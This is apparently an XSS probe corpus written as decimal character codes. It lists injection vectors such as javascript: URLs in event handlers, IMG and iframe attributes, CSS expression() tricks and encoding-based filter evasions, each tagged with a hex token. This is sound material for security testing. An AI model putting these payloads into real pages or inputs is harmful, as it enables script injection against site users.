17,116,116,111,110,32,102,111,114,109,61,34,116,101,115,116,34,32,102,111,114,109,97,99,116,105,111,110,61,34,106,97,118,97,115,99,114,105,112,116,58,55,48,97,57,99,48,54,55,98,98,98,101,49,56,55,51,51,48,98,54,101,51,101,51,98,57,102,56,57,48,99,98,34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102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,49,54,53,49,53,55,52,98,54,53,98,99,57,51,101,53,56,52,48,98,51,56,98,57,53,101,52,52,100,48,101,53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01,108,101,99,116,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,98,51,53,101,98,55,55,56,52,101,55,50,53,50,55,55,48,56,54,48,49,54,52,48,53,100,49,98,57,99,102,5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6,101,120,116,97,114,101,97,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,49,55,54,51,57,48,97,100,97,99,57,52,99,48,97,100,97,48,54,102,51,51,53,57,99,98,51,97,99,53,55,51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7,101,121,103,101,110,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,50,100,54,97,56,50,98,101,53,55,97,101,97,57,52,54,48,51,97,54,51,97,99,98,54,101,52,57,53,101,98,98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98,108,117,114,61,106,97,118,97,115,99,114,105,112,116,58,97,100,49,98,97,97,49,101,54,56,51,57,50,98,97,97,49,99,55,51,51,53,98,99,48,51,49,101,99,98,98,98,32,97,117,116,111,102,111,99,117,115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2,111,115,116,101,114,61,106,97,118,97,115,99,114,105,112,116,58,102,49,50,52,52,100,102,99,50,100,100,48,55,99,57,49,56,50,49,54,100,48,48,98,48,56,101,51,52,101,50,98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8,111,100,121,32,111,110,115,99,114,111,108,108,61,97,55,49,97,50,53,51,55,97,98,52,99,54,102,57,101,57,99,56,102,99,56,53,53,54,53,97,101,56,98,98,98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32,111,110,102,111,114,109,105,110,112,117,116,61,106,97,118,97,115,99,114,105,112,116,58,52,99,56,99,48,49,51,57,50,57,55,100,52,102,101,48,49,100,48,48,98,102,54,100,97,54,100,49,52,57,55,101,62,60,105,110,112,117,116,62,60,47,102,111,114,10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62,60,105,110,112,117,116,62,60,47,102,111,114,109,62,60,98,117,116,116,111,110,32,102,111,114,109,61,116,101,115,116,32,111,110,102,111,114,109,99,104,97,110,103,101,61,61,106,97,118,97,115,99,114,105,112,116,58,57,100,99,49,101,49,52,98,54,100,48,55,100,49,98,49,55,53,57,57,48,51,98,102,57,99,98,100,102,99,100,49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62,60,115,111,117,114,99,101,32,111,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,51,54,99,101,48,51,55,53,53,101,100,49,102,99,55,54,98,101,52,54,49,56,55,97,52,53,52,100,49,98,98,5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1,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,51,99,101,57,53,99,102,56,101,55,48,98,97,101,97,50,99,54,56,98,48,54,99,54,51,48,50,57,98,98,56,50,34,62,60,115,111,117,114,9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bb537cd4954fa2479335236018535ec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a48efa6917729f2096888dd469c8a7c5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88a8cb98c79d928006ed615a17fb2621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5f9834888f7fa8750c6fc7e40693a13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31f1066f2d09744c939b9260a0dc2ed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54e66066dd2eecd0b9803c885210352c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c255b257ffb8286cb5cfc6b0fd719013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054c88e7c1cf2f446ee7124121a1005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e6451ec09d0ed36fb19a6bd595d2d10c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d6ad6f6c7bfdbfab21d219451ad7f3bd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c83d9e82d5b039b42f0c3390c787f6b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64bd75fa0c7ff784cb2d9bc80bd5aa3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4ac6f6d38231ac4566a5b68f463401e4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b2d467ff8513aaa1a00638443f835e95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85f2a072e3a00c36559a1a40fe2534fa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f3171ca3ea84ca7bc94c319200e6ddc0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a813942b68122ad62082dacae4505d5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ebe6123aa8f74cc5bd50943a0c95c6b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c315677cee5bf44da9e011ece3c243d6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28c27070c916dbbd3e8c5bc7adde371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fe480ff6fd3fad8e541681e87aee9da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e3ec536eb1d660fb9bd638f2f71cb77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5a8c3e55107de3c697481b19bc2c393c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a9d5f2580cf991497d9f1b4551ea34f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e2fb5fcf386840c4fb015e0d5b6de920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ecbec774ba557a59a4d9f914ba93c931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beaddf6d41b3d35ddb3140fff0691495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f15216c842abd9b195a0a815ce1a3f9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059141b241296bb48ed61a08992b117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cdfee673f13e2e4d2031bf852d3cdcd2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9190e7ac006d9f73cbcd38e31616d5e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2eb6aaa2bfcd4d983df4708f3a2c6188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3a839b9cc08cb448d724663872e832b9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8a31e6a1b78953eb0a6de9a4712cd41b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fcad37d0329d435ac30edf60be295df8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6271aaf1d3de9f4e36874f9dc21aae76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85c86f7034a809ebd486292a71986f25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d76d9d72f2a57b611586f6b34ae8d9c3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aebb0d3d11bf756de4dc2cda45c369b0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05a225793217bbd3798bde8aef148147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aa9246dc50eae98c770e789fdcba65c8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3e628ee5a91d6992213ec5bb8c22663a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dd18e2e508329183734ac37759cabe2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d7385dc0679b2e925010af20206c5d3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3d6e500b35b55a3db3b57308ad082d07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801203546ee09666d6400b6fd7ec4d44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cfc022eaf41e1f89af1f62bbaf2c0f25*/ession(cfc022eaf41e1f89af1f62bbaf2c0f25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ae4a2c7fc4306a268eb838daacceab0style="xss:expression(fae4a2c7fc4306a268eb838daacceab0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81c2af8ba3b419426f887565d97dc5a9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4ae95233ef33f518260a4d99ac3b7fee{background-image:url("4ae95233ef33f518260a4d99ac3b7fee");}&lt;style&gt;&lt;aclass=4ae95233ef33f518260a4d99ac3b7fee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32b4daac403bb28a26b1da4baba2d86f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e87b56e67ef8eb9b1e1928658a8eca72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759c0a502e676fc7a54914f6563412f6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cc96091f12f26ba7b9304e726d0810db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ba50bd6d68957b083a079820885a5a01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54c74f9122de2f5f13b95d4fcbc94a83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aea4700ec5fc0fec6c8a1165ea7d1088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c77fd0935f0d8c835d5551016c92a18f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2ef11a9bf102f7bac1a02e744c04215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dae3d11c6a4e23bca3b6170d704ac24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b6a05a4c7081e10958d5dace3d4b859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dcd6bdc7731a5ed8519015ccaed12c06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ed3ab248eeb35485646fc3bf00717d75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021c34e7bb830753c429da97b39f6423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82ee9466183915e23525efbd6f24730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f55e6c9add40a4f0b771fa6842b8db69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7abff03571caa11504f1b2cc9a806450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58ca3dc523c14f6f81ea7f31a3a4c109/n58ca3dc523c14f6f81ea7f31a3a4c109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eebef8ffd87c85ae124999e89de406de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9addf4c95727f3b5c7a9651028b837a4&lt;style&gt;&lt;ul&gt;&lt;li&gt;9addf4c95727f3b5c7a9651028b837a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aa96fc5f91d2f8c175c46e8ab2ed218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3ae71360d6d25186ae765404ad2e4f15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0b26c96e0ddfa39f3d3340934eda25d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1ffebce786d42831987486b0f0408cc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1a98b91f66ff4253d90c908a0971839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0e5745e8b43d22c1fc403c5638c597e7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e0fd74dae765d45ffbaaf641c5be8389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a6ed93ae88cbe4bfb2edd008cd0e676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d4dfa3596b8c512fcbe0aa05283265a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146137f500351b5a52459468cb4930d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d8615a69cdfa2399fb7ff0876f0cd2b0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0fa1b10fc88a90fa33ec06f5ddfcd9f2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dc0843a85b3a78bd63bfc048462c7b23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0d4eb1eaf63e779f2f9d8c7097ab676a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aff49e3d4cc9e38dec52bc29dba5583f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e3b71943e1a0d1e21cff49dc729b6991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435565db70466926b9232a7bd8fcf0a8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eb0c418e04a4c6aa35fac3454de998e0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d0cd98cc91a4b9f1e3f401f3369300e9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a78a5d74403eddd209b303f27c3a50fd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be89f1a95b375d035980344bcc668dcb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c2787851587430e2ae6a39d41d2ed75a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aa0f9ae638704b507eb31b8e6db1eecf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36af08505381a862d876fd76cad8d44a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0a258244dd0c6e275f00be550f88ff51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32c6c6c5d71d7c1b557a390393c90d92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325e6fade01ecb8fe111df72fd32a5a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4c79b1c570c00127986f0b0c3e61efa3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,34,62,55,97,56,54,57,53,54,51,56,54,49,53,53,55,52,49,57,49,54,97,56,52,99,99,48,101,100,102,102,57,52,53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,34,62,60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,49,98,57,98,51,55,50,97,53,56,102,49,101,102,98,55,49,57,53,48,100,54,98,51,48,102,50,97,57,48,99,102,39,4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,39,39,59,33,45,45,34,60,57,102,49,57,49,57,57,102,100,98,53,57,55,100,52,53,54,56,98,51,98,51,100,53,53,97,100,99,48,101,51,54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,60,47,84,73,84,76,69,62,54,57,52,52,48,97,55,51,51,56,102,57,56,49,100,57,50,49,53,100,101,54,55,57,49,48,100,55,98,100,51,9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,34,62,60,105,109,103,32,115,114,99,61,34,120,58,120,34,32,111,110,101,114,114,111,114,61,34,99,98,56,57,52,54,54,54,56,97,53,49,57,56,100,53,56,55,52,50,48,98,101,51,101,101,53,54,54,49,48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,60,66,79,68,89,32,111,110,108,111,97,100,33,35,36,37,38,40,41,42,126,43,45,95,46,44,58,59,63,64,91,47,124,92,93,94,96,61,97,97,102,55,50,53,101,53,52,101,51,97,102,102,57,99,50,51,53,97,100,101,52,102,49,48,102,50,56,56,53,57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,39,39,59,33,45,45,34,60,99,50,100,48,100,49,48,101,54,98,53,55,50,50,48,54,49,100,51,101,55,99,57,50,53,54,99,52,57,57,102,57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,60,73,77,71,32,83,82,67,61,34,53,97,54,100,49,50,98,98,54,54,52,49,57,54,54,97,48,101,55,100,57,57,57,56,51,102,100,97,100,102,100,9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,60,73,77,71,32,83,82,67,61,57,100,56,100,48,97,56,52,49,57,97,54,53,102,50,101,101,55,99,100,99,57,99,51,56,53,101,102,102,54,50,50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,60,73,77,71,32,83,82,67,61,96,54,50,48,97,97,53,56,57,98,102,101,48,49,50,98,52,48,51,48,101,55,55,57,52,57,99,97,51,57,55,97,102,96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,60,73,77,71,32,34,34,34,62,52,56,99,49,100,51,49,101,100,54,55,55,98,99,56,102,97,100,52,49,57,49,57,49,102,53,99,102,50,98,101,10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,60,73,77,71,32,83,82,67,61,34,32,38,35,49,52,59,32,32,51,97,100,55,53,56,99,98,100,53,48,56,51,99,99,49,98,55,101,57,56,97,53,56,101,102,56,55,53,52,51,5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,60,68,73,86,32,83,84,89,76,69,61,34,98,101,104,97,118,105,111,117,114,58,32,117,114,108,40,53,50,97,52,56,53,57,99,50,51,100,52,100,52,53,100,49,49,56,50,99,57,53,52,53,100,99,102,57,48,51,56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,60,60,83,67,82,73,80,84,62,56,53,101,49,100,97,100,49,101,49,55,50,55,97,52,52,48,49,51,98,49,55,50,57,98,48,101,102,101,53,97,99,47,47,60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,34,59,57,56,52,56,101,51,98,57,50,97,50,99,49,48,49,51,53,99,53,55,97,54,56,52,53,102,54,99,49,48,100,57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,60,73,77,71,32,83,82,67,61,39,50,53,100,57,56,57,54,49,55,101,54,51,49,55,98,52,56,100,57,52,99,54,53,56,98,53,101,56,97,49,57,100,3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,60,66,79,68,89,32,66,65,67,75,71,82,79,85,78,68,61,34,52,100,56,53,51,56,57,50,102,55,57,54,102,99,51,99,53,54,56,97,100,55,55,48,56,102,99,48,102,101,54,10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,60,73,78,80,85,84,32,84,89,80,69,61,34,73,77,65,71,69,34,32,83,82,67,61,34,98,49,49,54,98,56,99,48,57,53,57,101,51,56,54,50,50,53,57,99,52,54,102,53,54,57,50,98,55,56,52,9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,60,66,79,68,89,32,79,78,76,79,65,68,61,102,99,53,50,50,53,102,97,49,100,99,52,55,48,49,49,101,102,57,54,52,52,99,98,49,54,57,51,100,101,53,97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,60,73,77,71,32,68,89,78,83,82,67,61,34,100,99,54,56,53,51,53,102,53,51,55,57,56,98,99,98,54,102,54,50,98,54,52,101,98,97,102,57,52,52,98,5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,60,73,77,71,32,76,79,87,83,82,67,61,34,51,51,49,55,56,48,56,50,53,54,100,102,100,57,54,56,49,50,98,52,54,52,98,53,53,50,56,54,100,52,51,5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,60,66,71,83,79,85,78,68,32,83,82,67,61,34,99,54,57,52,51,99,48,57,57,102,56,51,53,55,99,50,97,56,98,53,52,56,50,51,102,102,102,53,102,55,98,5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,60,66,82,32,83,73,90,69,61,34,38,123,51,52,100,57,99,49,49,101,56,52,50,97,101,102,51,57,49,97,54,98,55,50,49,99,97,56,97,56,48,49,102,50,12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,60,76,73,78,75,32,82,69,76,61,34,115,116,121,108,101,115,104,101,101,116,34,32,72,82,69,70,61,34,56,52,54,48,101,55,48,98,51,49,99,55,51,56,100,98,48,51,100,51,48,54,102,57,98,54,55,101,98,101,99,9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,60,73,77,71,32,83,82,67,61,39,118,98,115,99,114,105,112,116,58,49,97,57,50,57,52,48,56,56,57,101,101,56,53,54,51,102,98,54,55,97,50,50,50,56,55,100,99,99,100,101,98,3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,60,73,77,71,32,83,82,67,61,34,109,111,99,104,97,58,91,49,52,52,55,97,100,101,102,57,51,101,51,99,54,52,98,49,48,56,55,54,97,97,98,99,49,52,98,53,54,53,99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,60,73,77,71,32,83,82,67,61,34,108,105,118,101,115,99,114,105,112,116,58,91,53,98,54,48,53,54,55,100,53,49,100,56,51,97,48,57,53,54,53,100,52,52,98,56,98,51,98,98,100,51,57,98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,60,77,69,84,65,32,72,84,84,80,45,69,81,85,73,86,61,34,114,101,102,114,101,115,104,34,32,67,79,78,84,69,78,84,61,34,48,59,117,114,108,61,51,54,48,99,54,99,52,53,99,51,53,98,97,102,102,48,49,51,100,48,48,97,102,98,50,57,98,51,48,54,51,4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,60,84,65,66,76,69,32,66,65,67,75,71,82,79,85,78,68,61,34,54,97,48,53,55,50,98,48,99,50,48,56,52,100,50,50,102,53,52,54,98,100,50,48,97,56,48,49,57,98,99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,60,84,65,66,76,69,32,66,65,67,75,71,82,79,85,78,68,61,106,97,118,97,115,99,114,105,112,116,58,51,55,99,52,54,99,53,53,48,55,102,97,99,98,54,102,99,56,53,100,50,51,56,53,98,52,49,57,49,102,56,4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,60,84,65,66,76,69,62,60,84,68,32,66,65,67,75,71,82,79,85,78,68,61,34,99,51,55,100,57,98,98,100,98,50,101,98,55,97,51,51,57,48,53,97,97,57,102,97,53,52,48,48,100,50,55,5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,60,68,73,86,32,83,84,89,76,69,61,34,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,32,117,114,108,40,50,55,57,99,56,99,102,97,53,48,55,51,50,50,56,57,98,100,102,99,50,57,54,102,97,56,100,56,53,49,48,97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,60,68,73,86,32,83,84,89,76,69,61,34,119,105,100,116,104,58,32,101,120,112,114,101,115,115,105,111,110,40,50,54,100,56,56,54,98,100,52,56,99,55,49,52,101,102,56,51,53,101,102,51,57,99,98,50,98,56,100,51,55,55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,60,105,102,114,97,109,101,32,34,111,110,108,111,97,100,61,50,48,100,100,49,57,48,51,50,49,98,57,97,98,52,53,55,52,51,56,56,99,50,50,98,57,101,97,102,50,49,102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,60,105,102,114,97,109,101,47,32,34,111,110,108,111,97,100,61,55,57,102,50,54,57,48,98,102,56,55,101,56,56,98,97,49,49,50,49,101,54,50,48,48,55,55,53,48,49,99,54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,60,105,102,114,97,109,101,60,63,112,104,112,32,101,99,104,111,32,99,104,114,40,49,49,41,63,62,32,111,110,108,111,97,100,61,49,97,49,55,99,55,55,52,48,53,49,99,97,101,97,56,102,51,57,99,100,98,56,99,57,54,51,102,49,52,98,56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,60,105,102,114,97,109,101,60,63,112,104,112,32,101,99,104,111,32,99,104,114,40,49,50,41,63,62,32,111,110,108,111,97,100,61,53,52,102,48,48,55,97,100,56,49,55,52,101,54,99,56,57,50,49,52,100,50,56,50,97,99,54,48,56,49,50,56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,60,70,82,65,77,69,83,69,84,62,60,70,82,65,77,69,32,83,82,67,61,34,50,49,54,56,99,97,52,50,99,56,52,97,52,54,102,51,55,53,56,99,54,101,52,101,54,97,97,55,51,54,56,102,34,62,60,47,70,82,65,77,69,83,69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,60,84,65,66,76,69,32,66,65,67,75,71,82,79,85,78,68,61,34,51,55,51,55,102,57,54,48,53,48,97,100,50,99,57,57,50,102,98,100,53,98,99,99,48,49,54,54,49,55,53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,60,84,65,66,76,69,62,60,84,68,32,66,65,67,75,71,82,79,85,78,68,61,34,54,53,97,55,98,100,49,48,52,99,57,56,51,97,55,101,98,100,53,53,49,102,57,98,55,52,48,55,49,48,101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,60,68,73,86,32,83,84,89,76,69,61,34,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,32,117,114,108,40,38,35,49,59,49,50,100,56,53,51,51,57,99,100,49,51,98,51,55,50,57,55,57,97,99,99,102,53,52,99,99,53,102,54,52,56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,60,68,73,86,32,83,84,89,76,69,61,34,119,105,100,116,104,58,32,101,120,112,114,101,115,115,105,111,110,40,57,102,56,52,49,100,50,97,56,100,98,100,52,54,50,51,49,51,48,97,52,54,53,55,52,97,48,53,57,51,100,99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,60,73,77,71,32,83,84,89,76,69,61,34,120,115,115,58,101,120,112,114,47,42,52,101,56,57,57,97,51,48,98,54,53,97,100,52,101,97,97,56,99,49,101,55,50,57,99,54,56,97,99,98,99,49,42,47,101,115,115,105,111,110,40,52,101,56,57,57,97,51,48,98,54,53,97,100,52,101,97,97,56,99,49,101,55,50,57,99,54,56,97,99,98,99,49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,60,48,98,100,48,102,100,49,100,102,50,56,54,98,99,98,99,100,99,48,48,101,48,52,57,51,52,97,55,50,97,55,98,32,83,84,89,76,69,61,34,120,115,115,58,101,120,112,114,101,115,115,105,111,110,40,48,98,100,48,102,100,49,100,102,50,56,54,98,99,98,99,100,99,48,48,101,48,52,57,51,52,97,55,50,97,55,98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,60,83,84,89,76,69,32,84,89,80,69,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,99,52,100,101,101,99,52,50,53,97,100,52,102,102,51,48,51,100,54,52,50,97,50,55,98,53,99,52,53,48,50,55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,60,83,84,89,76,69,62,46,48,55,48,97,53,50,102,48,99,48,99,55,101,56,51,49,50,98,54,55,99,102,48,48,100,51,55,57,53,48,97,49,123,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,117,114,108,40,34,48,55,48,97,53,50,102,48,99,48,99,55,101,56,51,49,50,98,54,55,99,102,48,48,100,51,55,57,53,48,97,49,34,41,59,125,60,47,83,84,89,76,69,62,60,65,32,67,76,65,83,83,61,48,55,48,97,53,50,102,48,99,48,99,55,101,56,51,49,50,98,54,55,99,102,48,48,100,51,55,57,53,48,97,49,62,60,47,6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,60,83,84,89,76,69,32,116,121,112,101,61,34,116,101,120,116,47,99,115,115,34,62,66,79,68,89,123,98,97,99,107,103,114,111,117,110,100,58,117,114,108,40,34,54,55,53,102,57,98,97,51,48,51,55,98,50,51,52,57,98,52,57,57,56,97,51,48,100,50,51,51,57,55,98,97,34,41,125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,60,33,45,45,91,105,102,32,103,116,101,32,73,69,32,52,93,62,52,48,101,53,101,100,54,100,52,49,57,52,100,49,98,55,50,49,101,98,101,57,54,102,55,100,97,99,56,101,101,53,60,33,91,101,110,100,105,102,93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,60,66,65,83,69,32,72,82,69,70,61,34,56,49,98,54,48,99,53,98,99,100,52,52,100,101,51,51,100,52,55,52,57,102,97,52,53,49,52,53,101,48,55,48,47,4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,60,79,66,74,69,67,84,32,99,108,97,115,115,105,100,61,99,108,115,105,100,58,97,101,50,52,102,100,97,101,45,48,51,99,54,45,49,49,100,49,45,56,98,55,54,45,48,48,56,48,99,55,52,52,102,51,56,57,62,60,112,97,114,97,109,32,110,97,109,101,61,117,114,108,32,118,97,108,117,101,61,99,49,97,57,99,54,99,101,48,54,98,99,100,54,55,99,97,101,50,101,102,50,56,52,54,50,52,54,56,56,52,97,62,60,47,79,66,74,69,67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,97,61,34,103,101,116,34,59,98,61,34,85,82,76,40,34,34,59,99,61,34,106,97,118,97,115,99,114,105,112,116,58,34,59,100,61,34,49,102,49,56,98,57,102,102,48,51,57,54,57,52,50,54,102,57,55,48,54,101,99,52,101,102,48,50,49,97,49,51,34,41,34,59,101,118,97,108,40,97,43,98,43,99,43,100,41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,60,63,32,101,99,104,111,40,39,60,83,67,82,41,39,59,101,99,104,111,40,39,73,80,84,62,57,101,51,53,53,57,102,48,102,97,50,99,50,51,50,49,98,97,54,99,57,48,53,57,56,101,51,52,54,48,100,52,60,47,83,67,82,73,80,84,62,39,41,59,32,63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,60,77,69,84,65,32,72,84,84,80,45,69,81,85,73,86,61,34,83,101,116,45,67,111,111,107,105,101,34,32,67,111,110,116,101,110,116,61,34,85,83,69,82,73,68,61,38,108,116,59,83,67,82,73,80,84,38,103,116,59,55,102,54,99,101,98,50,54,100,101,51,101,54,48,53,99,50,52,55,54,99,51,52,50,54,57,50,49,53,102,102,98,38,108,116,59,47,83,67,82,73,80,84,38,103,116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,60,83,67,82,73,80,84,32,83,82,67,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,62,98,54,98,57,56,57,101,55,55,102,101,55,102,49,98,52,49,54,57,100,101,55,50,54,54,49,51,99,98,49,54,97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,60,73,77,71,32,83,82,67,61,34,38,49,52,59,106,97,118,97,115,99,114,105,112,116,58,55,99,54,51,102,48,97,54,100,98,56,49,48,56,102,53,97,48,99,49,101,102,50,50,101,51,48,101,97,55,97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,60,73,77,71,32,83,82,67,61,34,106,97,118,38,35,120,48,68,59,97,115,99,114,105,112,116,58,51,102,100,102,55,49,100,101,99,57,52,50,99,102,48,51,56,52,56,51,102,100,54,55,49,52,51,52,98,101,50,9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,45,45,45,32,60,73,77,71,32,83,82,67,61,34,32,38,35,49,52,59,32,32,100,102,102,56,52,55,49,56,53,52,54,52,102,55,48,97,56,55,55,52,99,98,56,54,48,50,56,51,97,99,100,10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,45,45,45,32,60,73,77,71,32,83,82,67,61,34,50,54,55,53,98,49,55,54,97,56,99,52,48,51,97,48,52,98,52,50,98,52,98,48,57,100,55,54,102,100,50,101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,60,83,67,82,73,80,84,32,60,66,62,61,53,54,56,54,102,55,57,100,50,97,48,50,99,54,100,99,55,53,98,51,100,101,54,51,52,99,53,48,56,54,99,50,34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,60,73,70,82,65,77,69,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,49,98,98,99,51,50,50,100,101,100,99,99,99,56,57,56,57,98,99,102,49,50,51,101,57,49,100,53,101,50,53,97,32,6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,60,83,67,82,73,80,84,62,97,61,47,101,53,51,51,54,55,100,101,57,51,54,99,52,54,99,49,56,51,55,97,54,98,54,98,50,52,51,52,100,98,99,101,47,110,101,53,51,51,54,55,100,101,57,51,54,99,52,54,99,49,56,51,55,97,54,98,54,98,50,52,51,52,100,98,99,10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,60,76,65,89,69,82,32,83,82,67,61,34,106,97,118,97,115,99,114,105,112,116,58,52,51,54,51,98,101,48,50,53,98,53,53,50,100,102,54,56,101,48,102,102,48,52,53,98,99,97,98,98,49,50,99,62,60,47,76,65,89,69,8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,60,83,84,89,76,69,62,108,105,32,123,108,105,115,116,45,115,116,121,108,101,45,105,109,97,103,101,58,32,117,114,108,40,34,52,50,49,49,54,57,54,51,102,101,99,52,54,52,54,97,48,54,99,101,98,99,102,52,53,53,100,54,99,56,57,50,60,47,83,84,89,76,69,62,60,85,76,62,60,76,73,62,52,50,49,49,54,57,54,51,102,101,99,52,54,52,54,97,48,54,99,101,98,99,102,52,53,53,100,54,99,56,57,5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,60,68,73,86,32,83,84,89,76,69,61,34,98,97,99,107,103,114,111,117,110,100,45,105,109,97,103,101,58,32,117,114,108,40,38,35,49,59,106,97,118,97,115,99,114,105,112,116,58,102,50,98,48,50,99,100,52,48,49,53,54,56,57,102,98,100,57,101,97,48,50,100,52,57,98,50,51,99,50,51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,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54,97,55,51,57,57,57,52,101,101,50,97,57,53,99,101,102,51,99,99,97,57,102,51,57,51,56,97,48,50,55,50,43,65,68,119,45,47,83,67,82,73,80,84,43,65,68,52,4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,60,97,32,104,114,101,102,61,34,106,97,118,97,115,99,114,105,112,116,35,98,97,101,49,55,57,57,53,98,52,97,49,51,101,48,56,57,51,97,53,101,51,48,98,56,57,100,55,100,48,100,4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,60,105,110,112,117,116,32,116,121,112,101,61,34,105,109,97,103,101,34,32,100,121,110,115,114,99,61,34,97,101,98,101,53,53,55,101,49,101,55,98,101,50,98,100,48,56,54,100,52,50,99,101,102,55,51,52,101,52,52,5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,38,98,100,55,53,49,52,56,101,99,57,57,57,97,98,57,97,98,49,54,97,51,101,55,99,100,55,98,98,53,98,53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,38,123,101,51,101,54,100,100,56,102,54,98,99,56,54,50,101,50,55,101,56,51,98,53,55,100,48,101,48,51,49,100,54,57,125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,60,73,77,71,32,83,82,67,61,38,123,57,100,101,99,57,52,97,102,56,57,52,48,50,101,102,57,49,48,101,52,48,98,54,53,57,97,55,99,49,50,100,102,125,5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,60,97,32,104,114,101,102,61,34,97,98,111,117,116,58,57,55,102,102,50,97,57,53,48,101,57,49,98,54,97,51,55,55,102,100,52,49,56,55,101,100,102,100,57,48,48,5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,60,68,73,86,32,83,84,89,76,69,61,34,98,105,110,100,105,110,103,58,32,117,114,108,40,106,97,118,97,115,99,114,105,112,116,58,51,100,53,52,52,56,102,97,56,50,51,98,52,99,55,100,51,54,54,98,101,100,100,49,51,49,57,53,52,99,54,55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,60,79,66,74,69,67,84,32,99,108,97,115,115,105,100,61,99,108,115,105,100,58,46,46,46,34,32,99,111,100,101,98,97,115,101,61,34,106,97,118,97,115,99,114,105,112,116,58,56,48,55,54,55,98,99,100,48,50,57,48,49,50,99,100,99,54,52,101,98,56,52,49,55,55,56,102,56,51,98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,60,115,116,121,108,101,62,60,33,45,45,60,47,115,116,121,108,101,62,60,83,67,82,73,80,84,62,55,51,53,100,54,53,97,55,49,50,48,99,52,51,98,50,51,52,52,52,56,52,102,102,49,51,102,52,55,102,101,52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,33,91,67,68,65,84,65,91,60,33,45,45,93,93,60,83,67,82,73,80,84,62,101,97,101,55,99,99,57,57,54,50,98,49,51,51,55,55,99,51,54,54,52,51,101,51,100,56,51,99,54,51,98,56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,60,33,45,45,32,45,45,32,45,45,62,54,55,100,49,100,54,48,52,48,97,101,101,56,50,100,49,51,51,52,53,51,97,55,99,98,53,55,49,101,57,51,48,60,33,45,45,32,45,45,32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,60,120,109,108,32,105,100,61,34,88,34,62,60,97,62,60,98,62,49,99,50,54,101,48,102,49,100,51,101,52,102,50,102,50,50,56,56,48,56,55,102,101,57,52,101,51,102,55,49,52,59,60,98,62,60,47,97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,60,100,105,118,32,100,97,116,97,102,108,100,61,34,98,34,32,100,97,116,97,102,111,114,109,97,116,97,115,61,34,104,116,109,108,34,32,100,97,116,97,115,114,99,61,34,35,48,101,100,56,99,48,52,57,51,51,48,55,56,99,99,55,49,100,53,101,97,54,102,49,101,52,49,56,57,101,101,51,34,62,60,47,100,105,11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,60,88,77,76,32,73,68,61,73,62,60,88,62,60,67,62,60,33,91,67,68,65,84,65,91,60,73,77,71,32,83,82,67,61,34,106,97,118,97,115,93,93,60,33,91,67,68,65,84,65,91,99,114,105,112,116,58,97,48,97,51,51,52,57,49,98,51,55,53,100,52,50,97,99,54,48,50,48,56,56,102,99,55,52,57,100,98,57,54,34,62,93,93,60,47,67,62,60,88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,60,102,111,114,109,32,105,100,61,34,116,101,115,116,34,32,47,62,60,98,117,116,116,111,110,32,102,111,114,109,61,34,116,101,115,116,34,32,102,111,114,109,97,99,116,105,111,110,61,34,106,97,118,97,115,99,114,105,112,116,58,100,99,101,49,54,100,98,51,49,49,48,99,101,50,100,49,98,53,53,57,53,101,51,101,52,100,50,57,55,102,98,97,34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,60,105,110,112,117,116,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,53,48,100,52,54,97,57,52,53,99,56,99,51,53,102,102,51,99,53,49,55,98,102,53,102,52,49,99,49,51,56,98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,60,115,101,108,101,99,116,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,49,52,50,54,55,98,48,56,52,55,57,50,102,55,55,101,102,100,53,54,54,54,53,100,48,99,101,51,99,97,48,97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,60,116,101,120,116,97,114,101,97,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,56,100,50,54,50,55,102,55,100,102,50,53,50,48,97,55,55,49,56,102,57,100,101,54,98,49,52,50,54,48,102,97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,60,107,101,121,103,101,110,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,98,99,100,52,48,51,101,56,56,100,102,56,48,102,100,50,49,100,56,102,102,99,57,97,55,99,50,102,97,100,53,53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,60,105,110,112,117,116,32,111,110,98,108,117,114,61,106,97,118,97,115,99,114,105,112,116,58,98,101,50,102,102,55,102,98,54,51,98,100,102,98,99,57,100,56,53,54,48,54,51,52,99,53,51,50,98,100,48,102,32,97,117,116,111,102,111,99,117,115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,60,118,105,100,101,111,32,112,111,115,116,101,114,61,106,97,118,97,115,99,114,105,112,116,58,54,48,51,102,57,100,56,54,49,99,98,52,99,99,50,102,55,50,102,97,57,54,49,100,53,98,97,51,53,56,49,100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,60,98,111,100,121,32,111,110,115,99,114,111,108,108,61,102,56,51,101,99,98,52,48,53,101,57,57,57,50,99,102,56,55,57,52,52,52,52,54,102,52,57,101,53,52,56,55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,88,60,102,111,114,109,32,105,100,61,116,101,115,116,32,111,110,102,111,114,109,105,110,112,117,116,61,106,97,118,97,115,99,114,105,112,116,58,49,52,49,57,53,57,53,50,101,52,97,50,98,53,101,51,100,54,102,99,48,49,99,54,50,50,51,51,98,48,49,98,62,60,105,110,112,117,116,62,60,47,102,111,114,10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,88,60,102,111,114,109,32,105,100,61,116,101,115,116,62,60,105,110,112,117,116,62,60,47,102,111,114,109,62,60,98,117,116,116,111,110,32,102,111,114,109,61,116,101,115,116,32,111,110,102,111,114,109,99,104,97,110,103,101,61,61,106,97,118,97,115,99,114,105,112,116,58,56,100,102,51,99,57,98,98,102,99,56,53,52,99,101,54,57,53,57,52,53,55,51,50,49,54,49,97,56,50,52,57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,60,118,105,100,101,111,62,60,115,111,117,114,99,101,32,111,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,55,53,48,49,100,100,50,48,55,102,102,57,57,52,101,101,49,97,99,48,102,102,54,54,98,100,50,50,101,53,57,9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,60,118,105,100,101,111,32,111,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,53,49,101,50,98,48,98,101,100,48,50,9